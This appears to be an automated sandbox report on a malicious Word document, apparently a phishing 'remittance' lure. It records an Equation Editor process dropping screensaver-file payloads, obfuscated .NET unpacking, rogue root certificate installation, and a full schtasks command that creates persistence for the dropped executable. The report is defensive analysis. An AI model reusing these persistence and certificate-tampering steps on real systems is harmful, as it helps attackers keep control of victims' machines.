                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: wow64win.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: wow64cpu.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: bcrypt.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: wbemcomn2.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: rpcrtremote.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: ntdsapi.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: webio.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: credssp.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: dwmapi.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: windowscodecs.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dll
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
                    Source: Remittance 17042024.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Remittance 17042024.doc
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, EjX9gQSXWavgOAKiaJ.cs.Net Code: HokWmiwN44 System.Reflection.Assembly.Load(byte[])
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, EjX9gQSXWavgOAKiaJ.cs.Net Code: HokWmiwN44 System.Reflection.Assembly.Load(byte[])
                    Source: 5.2.dzoihohj75439.scr.600000.0.raw.unpack, LoginForm.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_006501F4 push eax; retf 2_2_006501F5
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0065C2DC pushad ; retn 0065h2_2_0065C2DD
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrCode function: 5_2_009F7330 pushfd ; iretd 5_2_009F7339
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeCode function: 15_2_002F150A push FFFFFF83h; iretd 15_2_002F1524
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeCode function: 15_2_002F793B push es; iretd 15_2_002F7955
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeCode function: 15_2_002F3AB8 push esp; retn 0026h15_2_002F3AB9
                    Source: JBNvj66BwYU3yCv[1].scr.2.drStatic PE information: section name: .text entropy: 7.926722076742294
                    Source: dzoihohj75439.scr.2.drStatic PE information: section name: .text entropy: 7.926722076742294
                    Source: egFUHsL.exe.5.drStatic PE information: section name: .text entropy: 7.926722076742294
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, b8tmsF9xU9Z1v5o74w.csHigh entropy of concatenated method names: 't51gTlpbvA', 'wNDgQvlokI', 'mQBgslQ3EX', 'y00g7mEw2Q', 'uoegYYO9jv', 'x2pgfoOulS', 'B60g09Do4c', 'XxHgNwDfBQ', 'ADZgwTD5cQ', 'E4egheDTar'
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, R2aTrjUZSGhApXVB6N.csHigh entropy of concatenated method names: 'HCVyNxV15o', 'gUlyhC3DoQ', 'Qv4KjhJxf9', 'jK8KboWTjG', 's2ZyBx7ae1', 'pWDy4Judbr', 'Oylya4hfpq', 'FpYyTOFEPq', 'e0hyQX1g0n', 'itLysxS17u'
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, SE8ei8323SpOWjlTO6.csHigh entropy of concatenated method names: 'griJb8qMTq', 'HP2J1Ml9yA', 'J9LJWiIP6u', 'H35JuQQG79', 'UglJgHpjsE', 'J8bJ9MeiSO', 'vU4JxLEh6A', 'xXHK0yQos8', 'AwYKNnDI8W', 'KPJKwQnDGd'
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, Xyspjtd27UNPsTmZCs.csHigh entropy of concatenated method names: 'govbPmxQfM', 'unGbVhsaaF', 'nYgblQem76', 'p7UbZYq56j', 'tJFbpq2T5B', 'blAbqv6tbv', 'cYPlwWdWbX3J1g9SDV', 'EsEklB3a012Q0WeaHe', 'S7QbbMDLhd', 'MAob1A12rp'
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, c9sjD5bjIqyP5D3sx6.csHigh entropy of concatenated method names: 'GpCH5Mr5Lv', 'wiCHOHh4xc', 'W7eHcESXtE', 'agGH8hL6j5', 'BHFHprC8Ki', 'SW2HqHyMEo', 'JIFHyqnTK7', 'Ke0HKnYm1f', 'qeYHJItfW4', 'k3QH6pI1kv'
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, W0JwQqCGXX23lSQM8d.csHigh entropy of concatenated method names: 'eIY9CpqaPR', 'dUD9d2N4CB', 'S0WHXUwhTL', 'RReH3HKH5v', 'SCqHkJeJsY', 'jSIHGDKoNQ', 'w3RHelIWeM', 'c9gHioBhdY', 'QPTHMqv3MA', 'vXaHEYgebU'
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, RpNwKIh1quupYTAWJq.csHigh entropy of concatenated method names: 'nZPKoHaA9y', 'Ex2KrG7fIx', 'O7BKX6EngB', 'EaiK3FQi3J', 'fITKTEhHdC', 't4CKk2yw8i', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, o3AqPRMLTG9jt0XNEUA.csHigh entropy of concatenated method names: 'QLvJSpAVxO', 'h4iJ27jIlQ', 'vcPJm6QaBc', 'HKbJ58j9aW', 'WGlJCGol8v', 'fB9JOPPc8L', 'yJuJdBRQbw', 'Ax8JcScZhq', 'e9gJ8GcL1c', 'HrYJAXhSq6'
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, Q8VsNLPepUDd5G6cwB.csHigh entropy of concatenated method names: 'TCRPuUS3Uk', 'B9sPHi9Z5P', 'z8OPxyKheo', 'krMxhE1pRs', 'Xraxzidn5A', 'FpiPjUPTxI', 'kk6Pbk4I63', 'UuhPvaWKDX', 'RIBP1gnQFJ', 'yprPWRb1C4'
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, SD50yhgTTo4BDKVIvI.csHigh entropy of concatenated method names: 'co1tc9Wiwu', 'WpEt8v2AMt', 'tn6to7e6Le', 'Y27trC2vxw', 'j3Ft3113FK', 'mQxtkANDQw', 'rmFtexXXZa', 'n8jtiqK2Z5', 'nEhtEbX0nm', 'Qd0tBwui1T'
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, Sb59cPIvBCJELE9Lt1.csHigh entropy of concatenated method names: 'nxfxFcS8WI', 'zbHxguTHpW', 'HEox9O6l54', 'XcixPxRuHM', 'As3xVtqqgK', 'zvJ9YSvLbl', 'eY99fap2pd', 'bW190Anmod', 'HBN9NdMOoo', 'EW49wpREis'
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, jBgHpTxfiBFwai9cLd.csHigh entropy of concatenated method names: 'TqSpECwCe4', 'nDjp4sp18w', 'JjdpTEZH4V', 'cBppQYMUYc', 'bAXprpv8SQ', 'lhppXL8NtU', 'JSmp3elkYd', 'umVpk4uBxo', 'Jr9pGCkx42', 'B5jpepd2Ki'
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, IphJi82PHmFmnIX9f9.csHigh entropy of concatenated method names: 'O4ryle8PmR', 'Ks4yZIdRJc', 'ToString', 'GPyyu9MAIb', 'aj1ygfdhuK', 'i0hyHMDTdF', 'Qpky9CxTO7', 'DBZyxNH7ue', 'wo0yPEMlux', 'zhpyVPIFv8'
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, vtC8w5RPTmxUvrRvBU.csHigh entropy of concatenated method names: 'ToString', 'orOqBRHpUm', 'xxKqravW1t', 'zR9qXO73NZ', 'BcAq3vHdNp', 'A7EqkxsW0e', 'cj7qGYUJhF', 'EUSqeSuFoL', 'z5VqiNPWri', 'npLqMsGc6h'
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, dbQQPlY74ymdeL3mPO.csHigh entropy of concatenated method names: 'zU0m3eZ48', 'cts5Ldi6a', 'tv2OfCwa4', 'OyrdZHiLY', 'eMl8IxwIX', 'om8AgTU0h', 'cpOYPTGU6hhBd4bSmi', 'qtKqE47XkHjBOEswC9', 'zdsKhYCaC', 'Gtb6XfsDa'
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, whQdg8zbGa9CLqYN2J.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PADJtj6op4', 'qw7JpNwFyx', 'rKuJqQg3oT', 'cgYJyua4N4', 'jRyJKbeGj2', 'L1QJJlfsms', 'SS2J6lfjcZ'
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, EjX9gQSXWavgOAKiaJ.csHigh entropy of concatenated method names: 'wOD1Fd6540', 'fEC1unxdYA', 'V7B1gtUmVq', 'xFQ1HG0Akt', 'PCM19aoONm', 'eWx1xt0gIp', 'eFh1PIo5TV', 'IPe1VXceXX', 'OuM1DYNQTs', 'Ku31lJbuR8'
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, IpnFxe0jUJqbrvbLc7.csHigh entropy of concatenated method names: 'VpdjiaRjhN4cfhdsMvE', 'xaxy06R04c2gD9C1Zou', 'z1txK6ihTl', 'okrxJrZuqB', 'eXPx6W4CD0', 'ztdWP5ROOafWGoqQsoq', 'KTslAgRk273y3sGpv0D'
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, vecnntKZmWmrT6UEmG.csHigh entropy of concatenated method names: 'Dispose', 'WYbbwYL4Iy', 'YCDvrUlXxs', 'l7KUUHHmSg', 'VmDbhwGtgm', 'usEbzSeCdF', 'ProcessDialogKey', 'EBbvjuwTrh', 'lyOvbSvdRX', 'T06vvd8Z93'
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, FukiUSA0vcIEgBScU2.csHigh entropy of concatenated method names: 'zOKPSVo6V5', 'UoQP2RiNlx', 'TQCPm08G2H', 's4KP5PKASV', 'BnRPCuSVna', 'mpyPOrVwvS', 'GfJPdL7r9B', 'fJsPcGIWVi', 'U0TP8vQ9Td', 'RAkPApVJgL'
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, KnkMnHMuuAR5gypCln4.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PDM6TUIlyd', 'HDU6Q7YSvM', 'nZ16sxMaIh', 'jq567btrEh', 'v2c6YLmsH9', 'D8D6fIwphK', 'UVI60wXPxh'
                    Source: 5.2.dzoihohj75439.scr.50b0000.9.raw.unpack, ohPx6xFEdxkA3fYdLs.csHigh entropy of concatenated method names: 'YvRKu1J0uV', 'QKLKg1803I', 'hk0KH84WOP', 'G4hK9corYV', 'EH8KxyLPRY', 'SrjKPUJw9E', 'J2gKVM4SlN', 'lLAKDhalkm', 'be2KlMDXtp', 'lwEKZ8uG6Q'
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, b8tmsF9xU9Z1v5o74w.csHigh entropy of concatenated method names: 't51gTlpbvA', 'wNDgQvlokI', 'mQBgslQ3EX', 'y00g7mEw2Q', 'uoegYYO9jv', 'x2pgfoOulS', 'B60g09Do4c', 'XxHgNwDfBQ', 'ADZgwTD5cQ', 'E4egheDTar'
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, R2aTrjUZSGhApXVB6N.csHigh entropy of concatenated method names: 'HCVyNxV15o', 'gUlyhC3DoQ', 'Qv4KjhJxf9', 'jK8KboWTjG', 's2ZyBx7ae1', 'pWDy4Judbr', 'Oylya4hfpq', 'FpYyTOFEPq', 'e0hyQX1g0n', 'itLysxS17u'
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, SE8ei8323SpOWjlTO6.csHigh entropy of concatenated method names: 'griJb8qMTq', 'HP2J1Ml9yA', 'J9LJWiIP6u', 'H35JuQQG79', 'UglJgHpjsE', 'J8bJ9MeiSO', 'vU4JxLEh6A', 'xXHK0yQos8', 'AwYKNnDI8W', 'KPJKwQnDGd'
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, Xyspjtd27UNPsTmZCs.csHigh entropy of concatenated method names: 'govbPmxQfM', 'unGbVhsaaF', 'nYgblQem76', 'p7UbZYq56j', 'tJFbpq2T5B', 'blAbqv6tbv', 'cYPlwWdWbX3J1g9SDV', 'EsEklB3a012Q0WeaHe', 'S7QbbMDLhd', 'MAob1A12rp'
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, c9sjD5bjIqyP5D3sx6.csHigh entropy of concatenated method names: 'GpCH5Mr5Lv', 'wiCHOHh4xc', 'W7eHcESXtE', 'agGH8hL6j5', 'BHFHprC8Ki', 'SW2HqHyMEo', 'JIFHyqnTK7', 'Ke0HKnYm1f', 'qeYHJItfW4', 'k3QH6pI1kv'
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, W0JwQqCGXX23lSQM8d.csHigh entropy of concatenated method names: 'eIY9CpqaPR', 'dUD9d2N4CB', 'S0WHXUwhTL', 'RReH3HKH5v', 'SCqHkJeJsY', 'jSIHGDKoNQ', 'w3RHelIWeM', 'c9gHioBhdY', 'QPTHMqv3MA', 'vXaHEYgebU'
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, RpNwKIh1quupYTAWJq.csHigh entropy of concatenated method names: 'nZPKoHaA9y', 'Ex2KrG7fIx', 'O7BKX6EngB', 'EaiK3FQi3J', 'fITKTEhHdC', 't4CKk2yw8i', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, o3AqPRMLTG9jt0XNEUA.csHigh entropy of concatenated method names: 'QLvJSpAVxO', 'h4iJ27jIlQ', 'vcPJm6QaBc', 'HKbJ58j9aW', 'WGlJCGol8v', 'fB9JOPPc8L', 'yJuJdBRQbw', 'Ax8JcScZhq', 'e9gJ8GcL1c', 'HrYJAXhSq6'
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, Q8VsNLPepUDd5G6cwB.csHigh entropy of concatenated method names: 'TCRPuUS3Uk', 'B9sPHi9Z5P', 'z8OPxyKheo', 'krMxhE1pRs', 'Xraxzidn5A', 'FpiPjUPTxI', 'kk6Pbk4I63', 'UuhPvaWKDX', 'RIBP1gnQFJ', 'yprPWRb1C4'
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, SD50yhgTTo4BDKVIvI.csHigh entropy of concatenated method names: 'co1tc9Wiwu', 'WpEt8v2AMt', 'tn6to7e6Le', 'Y27trC2vxw', 'j3Ft3113FK', 'mQxtkANDQw', 'rmFtexXXZa', 'n8jtiqK2Z5', 'nEhtEbX0nm', 'Qd0tBwui1T'
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, Sb59cPIvBCJELE9Lt1.csHigh entropy of concatenated method names: 'nxfxFcS8WI', 'zbHxguTHpW', 'HEox9O6l54', 'XcixPxRuHM', 'As3xVtqqgK', 'zvJ9YSvLbl', 'eY99fap2pd', 'bW190Anmod', 'HBN9NdMOoo', 'EW49wpREis'
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, jBgHpTxfiBFwai9cLd.csHigh entropy of concatenated method names: 'TqSpECwCe4', 'nDjp4sp18w', 'JjdpTEZH4V', 'cBppQYMUYc', 'bAXprpv8SQ', 'lhppXL8NtU', 'JSmp3elkYd', 'umVpk4uBxo', 'Jr9pGCkx42', 'B5jpepd2Ki'
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, IphJi82PHmFmnIX9f9.csHigh entropy of concatenated method names: 'O4ryle8PmR', 'Ks4yZIdRJc', 'ToString', 'GPyyu9MAIb', 'aj1ygfdhuK', 'i0hyHMDTdF', 'Qpky9CxTO7', 'DBZyxNH7ue', 'wo0yPEMlux', 'zhpyVPIFv8'
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, vtC8w5RPTmxUvrRvBU.csHigh entropy of concatenated method names: 'ToString', 'orOqBRHpUm', 'xxKqravW1t', 'zR9qXO73NZ', 'BcAq3vHdNp', 'A7EqkxsW0e', 'cj7qGYUJhF', 'EUSqeSuFoL', 'z5VqiNPWri', 'npLqMsGc6h'
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, dbQQPlY74ymdeL3mPO.csHigh entropy of concatenated method names: 'zU0m3eZ48', 'cts5Ldi6a', 'tv2OfCwa4', 'OyrdZHiLY', 'eMl8IxwIX', 'om8AgTU0h', 'cpOYPTGU6hhBd4bSmi', 'qtKqE47XkHjBOEswC9', 'zdsKhYCaC', 'Gtb6XfsDa'
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, whQdg8zbGa9CLqYN2J.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PADJtj6op4', 'qw7JpNwFyx', 'rKuJqQg3oT', 'cgYJyua4N4', 'jRyJKbeGj2', 'L1QJJlfsms', 'SS2J6lfjcZ'
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, EjX9gQSXWavgOAKiaJ.csHigh entropy of concatenated method names: 'wOD1Fd6540', 'fEC1unxdYA', 'V7B1gtUmVq', 'xFQ1HG0Akt', 'PCM19aoONm', 'eWx1xt0gIp', 'eFh1PIo5TV', 'IPe1VXceXX', 'OuM1DYNQTs', 'Ku31lJbuR8'
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, IpnFxe0jUJqbrvbLc7.csHigh entropy of concatenated method names: 'VpdjiaRjhN4cfhdsMvE', 'xaxy06R04c2gD9C1Zou', 'z1txK6ihTl', 'okrxJrZuqB', 'eXPx6W4CD0', 'ztdWP5ROOafWGoqQsoq', 'KTslAgRk273y3sGpv0D'
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, vecnntKZmWmrT6UEmG.csHigh entropy of concatenated method names: 'Dispose', 'WYbbwYL4Iy', 'YCDvrUlXxs', 'l7KUUHHmSg', 'VmDbhwGtgm', 'usEbzSeCdF', 'ProcessDialogKey', 'EBbvjuwTrh', 'lyOvbSvdRX', 'T06vvd8Z93'
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, FukiUSA0vcIEgBScU2.csHigh entropy of concatenated method names: 'zOKPSVo6V5', 'UoQP2RiNlx', 'TQCPm08G2H', 's4KP5PKASV', 'BnRPCuSVna', 'mpyPOrVwvS', 'GfJPdL7r9B', 'fJsPcGIWVi', 'U0TP8vQ9Td', 'RAkPApVJgL'
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, KnkMnHMuuAR5gypCln4.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PDM6TUIlyd', 'HDU6Q7YSvM', 'nZ16sxMaIh', 'jq567btrEh', 'v2c6YLmsH9', 'D8D6fIwphK', 'UVI60wXPxh'
                    Source: 5.2.dzoihohj75439.scr.354b6b0.5.raw.unpack, ohPx6xFEdxkA3fYdLs.csHigh entropy of concatenated method names: 'YvRKu1J0uV', 'QKLKg1803I', 'hk0KH84WOP', 'G4hK9corYV', 'EH8KxyLPRY', 'SrjKPUJw9E', 'J2gKVM4SlN', 'lLAKDhalkm', 'be2KlMDXtp', 'lwEKZ8uG6Q'

                    Persistence and Installation Behavior

                    barindex
                    Drops PE files with a suspicious file extension
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\JBNvj66BwYU3yCv[1].scrJump to dropped file
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\dzoihohj75439.scrJump to dropped file
                    Installs new ROOT certificates
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\JBNvj66BwYU3yCv[1].scrJump to dropped file
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\dzoihohj75439.scrJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile created: C:\Users\user\AppData\Roaming\egFUHsL.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\egFUHsL" /XML "C:\Users\user\AppData\Local\Temp\tmp871B.tmp"
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
